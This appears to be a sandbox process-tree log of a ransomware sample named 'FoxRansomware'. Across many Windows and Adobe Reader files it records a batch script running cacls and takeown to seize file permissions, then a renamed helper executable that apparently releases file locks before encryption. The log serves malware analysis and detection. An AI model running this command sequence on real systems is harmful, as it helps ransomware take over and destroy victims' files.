C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:3740
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:5624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:5616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:4512
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:5604
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵PID:3328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tasks.xml" -nobanner3⤵PID:3760
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "tasks.xml" -nobanner4⤵PID:3808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:3324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:3132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:4132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "behavior.xml" -nobanner3⤵PID:3248
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "behavior.xml" -nobanner4⤵PID:840
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:5764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:3736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:3816
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:3828
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:5696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:5836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:5796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:3788
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:5892
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5840
-
-
-
[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"" | PID:5828
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C | PID:4128
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" | PID:4200
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner | PID:4116
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "resource.xml" -nobanner | PID:5956
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:4248

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"" | PID:5976
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C | PID:5820
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" | Modifies file permissions | PID:4148
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner | PID:4220
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "resource.xml" -nobanner | PID:4172
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:6132

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"" | PID:4228
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C | PID:4360
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" | Modifies file permissions | PID:4276
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "directories.acrodata" -nobanner | PID:2436
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "directories.acrodata" -nobanner | PID:1420
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:1896

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"" | PID:2516
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C | PID:5188
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" | PID:4596
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "behavior.xml" -nobanner | PID:5880
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "behavior.xml" -nobanner | PID:4616
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5908

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"" | PID:2152
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C | PID:4752
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" | PID:1704
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner | PID:4796
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "resource.xml" -nobanner | PID:1988
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:4804

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"" | PID:4644
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C | PID:4656
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" | PID:4928
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner | PID:4876
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "resource.xml" -nobanner | PID:4884
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:4932

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"" | PID:4768
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C | PID:2600
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" | Modifies file permissions | PID:4820
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ChessMCE.png" -nobanner | PID:5936
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "ChessMCE.png" -nobanner | PID:5044
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5948

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"" | PID:5012
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C | PID:6024
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" | Modifies file permissions | PID:4800
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ended_review_or_form.gif" -nobanner | PID:6028
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "ended_review_or_form.gif" -nobanner | PID:6040
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:6048

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"" | PID:6004
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C | PID:6116
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" | PID:3704
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "reviewers.gif" -nobanner | PID:1076
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "reviewers.gif" -nobanner | PID:1768
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:6084

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"" | PID:6088
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C | PID:5080
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" | PID:2488
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "server_lg.gif" -nobanner | PID:4888
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "server_lg.gif" -nobanner | PID:4000
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:4364

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"" | PID:2904
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C | PID:1872
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" | PID:6008
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "turnOnNotificationInTray.gif" -nobanner | PID:4984
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "turnOnNotificationInTray.gif" -nobanner | PID:888
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:4328

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"" | PID:4392
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C | PID:1592
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" | PID:1512
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MinionPro-Bold.otf" -nobanner | PID:3572
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "MinionPro-Bold.otf" -nobanner | PID:2876
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:2704

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"" | PID:3432
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C | PID:4324
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" | Modifies file permissions | PID:692
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "zy______.pfm" -nobanner | PID:3116
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "zy______.pfm" -nobanner | PID:3452
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:2780

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"" | PID:3536
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C | PID:3484
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" | Modifies file permissions | PID:1352
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt.fca" -nobanner | PID:436
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "brt.fca" -nobanner | PID:3592
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:3524

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"" | PID:3748
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C | PID:3664
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" | PID:2232
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "eng.hyp" -nobanner | PID:3580
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "eng.hyp" -nobanner | PID:3440
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:3232

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"" | PID:3840
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C | PID:5260
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" | PID:3408
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "zdingbat.txt" -nobanner | PID:3336
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "zdingbat.txt" -nobanner | PID:5364
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5388

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"" | PID:5360
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C | PID:2560
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" | PID:5284
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "TURKISH.TXT" -nobanner | PID:3304
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "TURKISH.TXT" -nobanner | PID:5420
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:4404

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"" | PID:4420
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C | PID:5496
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" | Modifies file permissions | PID:5512
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "watermark.png" -nobanner | PID:2900
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "watermark.png" -nobanner | PID:5464
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5468

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"" | PID:5456
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C | PID:5404
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" | PID:2456
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner | PID:700
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "resource.xml" -nobanner | PID:668
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5520

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"" | PID:5944
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C | PID:2688
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" | PID:5144
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "eula.ini" -nobanner | PID:5156
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "eula.ini" -nobanner | PID:5184
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5140

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"" | PID:5204
  [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C | PID:2620
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" | Modifies file permissions | PID:2356
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AcroSign.prc" -nobanner | PID:2628
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "AcroSign.prc" -nobanner | PID:1524
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner | PID:5212

[2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"" | PID:2508
